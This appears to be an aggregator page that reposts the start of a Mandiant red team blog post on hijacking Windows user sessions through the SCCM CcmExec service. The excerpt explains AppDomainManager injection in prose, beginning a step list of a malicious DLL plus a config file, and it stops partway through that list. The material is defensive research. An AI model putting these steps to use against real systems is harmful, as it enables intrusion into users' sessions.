One Article Review
| Source |  Mandiant |
|---|---|
| Identifiant | 8500399 |
| Date de publication | 2024-03-28 13:00:00 (vue: 2024-05-15 19:06:53) |
| Titre | Seseeyouexec: Windows Session Rijacking via CCMEXEC SeeSeeYouExec: Windows Session Hijacking via CcmExec |
| Texte | Written by: Andrew Oliveau
Over the last several years, the security community has witnessed an uptick in System Center Configuration Manager (SCCM)-related attacks. From extracting network access account (NAA) credentials to deploying malicious applications to targeted devices, SCCM attacks have aided in accomplishing complex objectives and evading existing detections. Mandiant\'s Red Team has utilized SCCM technology to perform novel attacks against mature clients where conventional methodology was not possible. One such SCCM attack is introduced in this blog post. There was a time when red teamers with elevated privileges on a Windows system could effortlessly inject shellcode into an unsuspecting user\'s processes. This allowed red teamers to carry out post-exploitation activities within that new process, such as keylogging or accessing LDAP as the affected user. However, as endpoint detection and response (EDR) systems have improved, remote process injection has turned into a risky operation, pushing red teamers to seek alternative methods to hijack a user\'s session. Enter CcmExec, a service native to SCCM Windows clients that has an interesting design that is useful for red teamers. In this blog post, we delve into how the CcmExec service can be utilized for session hijacking and introduce CcmPwn, a tool designed to facilitate this technique. Finally, we will discuss detection strategies for security teams. AppDomainManager Injection Before diving into CcmExec, it is important to understand the intricacies of AppDomainManager injection, a loader hijacking technique used by attackers to execute arbitrary code within a .NET application. In essence, the .NET framework provides a way to manage application domains, which are isolated environments where .NET applications can run code. The AppDomainManager class is a key part of this infrastructure, responsible for creating and managing these application domains. However, if an attacker were to override the AppDomainManager class constructor, they could force the hosting application to run attacker-defined behavior when creating an application domain. The most common method to perform AppDomainManager injection is through a .config file. This approach involves modifying the application\'s configuration file to specify a custom dynamic-link library file (DLL) and AppDomainManager to be executed by the .NET application. Here\'s how it\'s done: Create a custom AppDomainManager: Develop a class that derives from AppDomainManager and includes malicious code. Compile this class into a DLL. Create a configuration file: Modify or create the application\'s |
| Notes | ★★ |
| Envoyé | Oui |
| Condensat | 1026 7036 |
| Tags | Tool |
| Stories | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.